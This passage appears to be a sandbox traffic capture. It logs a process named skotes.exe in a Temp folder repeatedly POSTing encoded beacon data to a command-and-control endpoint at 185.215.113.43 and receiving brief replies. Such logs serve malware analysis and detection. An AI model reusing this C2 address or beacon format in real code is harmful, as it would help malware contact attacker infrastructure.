Dec 18, 2024 13:43:50.303644896 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:43:51.635812044 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:43:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
113	192.168.2.8	50124	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:43:53.389151096 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:43:54.720287085 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:43:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
114	192.168.2.8	50125	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:43:56.360919952 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:43:57.699856043 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:43:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
115	192.168.2.8	50126	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:43:59.451742887 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:44:00.798922062 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:44:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
116	192.168.2.8	50127	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:44:02.434478998 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:44:03.962045908 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:44:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
117	192.168.2.8	50128	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:44:05.718992949 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:44:07.052349091 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:44:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
118	192.168.2.8	50129	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:44:08.685805082 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:44:10.434572935 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:44:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
119	192.168.2.8	50130	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:44:12.187868118 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:44:13.538960934 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:44:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
120	192.168.2.8	50131	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:44:15.169394970 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:44:16.519881964 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:44:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
121	192.168.2.8	50132	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:44:18.279494047 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:44:19.627476931 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:44:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
122	192.168.2.8	50133	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:44:21.316957951 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:44:22.653917074 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:44:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
123	192.168.2.8	50134	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:44:24.402930021 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:44:25.750965118 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:44:25 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
124	192.168.2.8	50135	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:44:27.387778044 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:44:28.726241112 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:44:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
125	192.168.2.8	50136	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:44:30.497662067 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:44:31.849546909 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:44:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
126	192.168.2.8	50137	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:44:33.483820915 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:44:34.822768927 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:44:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
127	192.168.2.8	50139	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:44:38.115787983 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:44:39.460560083 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:44:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
128	192.168.2.8	50140	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:44:41.222575903 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:44:42.567693949 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:44:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
129	192.168.2.8	50141	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:44:44.206120014 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:44:46.412508965 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:44:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
130	192.168.2.8	50142	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:44:48.168921947 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:44:49.501383066 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:44:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
131	192.168.2.8	50143	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:44:51.137634039 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:44:52.508403063 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:44:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
132	192.168.2.8	50144	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:44:54.263036966 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:44:55.670896053 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:44:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
133	192.168.2.8	50145	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:44:57.311526060 CET	310	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 41 37 41 42 46 33 37 41 46 37 34 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FCA7ABF37AF74FE481D3DA8732070E7A105D117CE95E9
Dec 18, 2024 13:44:58.648433924 CET	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:44:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
134	192.168.2.8	50146	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Timestamp	Bytes transferred	Direction	Data
Dec 18, 2024 13:45:00.402940989 CET	156	OUT	POST /Zu7JuNko/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.43 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Dec 18, 2024 13:45:01.736984015 CET	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 18 Dec 2024 12:45:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
135	192.168.2.8	50147	185.215.113.43	80	5480	C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

